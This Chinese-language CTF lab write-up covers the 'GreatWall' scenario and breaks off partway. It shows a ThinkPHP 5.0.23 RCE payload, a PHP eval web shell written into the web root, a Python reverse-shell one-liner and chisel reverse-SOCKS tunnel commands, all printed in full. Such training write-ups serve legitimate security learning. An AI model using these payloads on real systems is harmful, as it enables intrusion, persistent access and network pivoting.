春秋云境笔记 - 1

GreatWall / *

GreatWall

用 fscan 扫一下，直接就扫出是 tp5 的漏洞

[2025-04-12 15:40:37] [SUCCESS] 目标: http://8.130.145.86:8080
  漏洞类型: poc-yaml-thinkphp5023-method-rce
  漏洞名称: poc1
  详细信息:
        links:https://github.com/vulhub/vulhub/tree/master/thinkphp/5.0.23-rce

用 PoC 试了一下，可以 RCE，对着路由 /index.php?s=captcha 发一个 POST，带上如下参数：

_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=id

执行 pwd 看到当前目录为 /var/www/html/background/public

执行以下命令写一个 PHP 马，注意要使用单引号，双引号的话 $_POST 变量会被解析掉，导致写的马不对

echo '<?php @eval($_POST[cmd]);?>' > /var/www/html/background/public/test.php

用蚁剑连接，在根目录拿到 flag01：flag{176f49b6-147f-4557-99ec-ba0a351e1ada}

再写个 python 反弹 shell 的脚本：

import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);

然后在蚁剑的终端里执行（蚁剑这个终端就怪怪的）
用蚁剑把 fscan 传上去，执行 ip a 看一下地址

搞个 chisel，在 VPS 上执行

./chisel_1.10.1_linux_amd64 server -p 6667 --reverse

./chisel client *.*.*.*:6667 R:0.0.0.0:10000:socks &

// To be continued…

参考

2024 - GreatWall